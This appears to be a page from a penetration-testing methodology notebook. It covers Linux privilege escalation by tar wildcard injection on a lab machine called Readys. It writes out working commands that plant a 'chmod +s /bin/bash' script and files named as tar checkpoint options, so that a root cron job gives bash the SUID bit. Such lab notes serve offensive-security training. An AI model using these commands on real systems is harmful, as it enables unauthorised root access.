> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/methodology/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/methodology/readme/privilege-escalation/linux/tar-wilcard-injection.md).

# Tar Wilcard Injection

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2Fw6YlBEWOiFmNChTgHiiI%2Fimage.png?alt=media\&token=115e437a-be8a-4b3d-875e-ed349a4d8562)

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2Fj5nV4VJzDyZervhr8guu%2Fimage.png?alt=media\&token=35e1d40a-ad6e-446a-891e-6e4203edd2da)

Check to see where these scripts change their directory to. In this case it was the /var/www/html directory, somewhere were we have write access.&#x20;

### 1ST METHOD&#x20;

```
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ 
```

We then create two empty files using `touch`. The first will cause `tar` to cause a checkpoint on every file and the second will tell `tar` to execute our **exploit.sh** with `bash` on every checkpoint.

```
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
touch ./"--checkpoint-action=exec=bash exploit.sh"
```

After a few minutes, we check if the cron job has run and if SUID is set on **/bin/bash**.

```
alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
```

You can follow this blog for the other different methods to escalate.&#x20;

{% embed url="<https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/>" %}

Refer to the box Readys.&#x20;

<details>

<summary>Examples</summary>

[https://app.gitbook.com/s/cG3oCXV6GXQITzoSNBJK/priv-escalation](https://lyethar.gitbook.io/readys/priv-escalation)

</details>
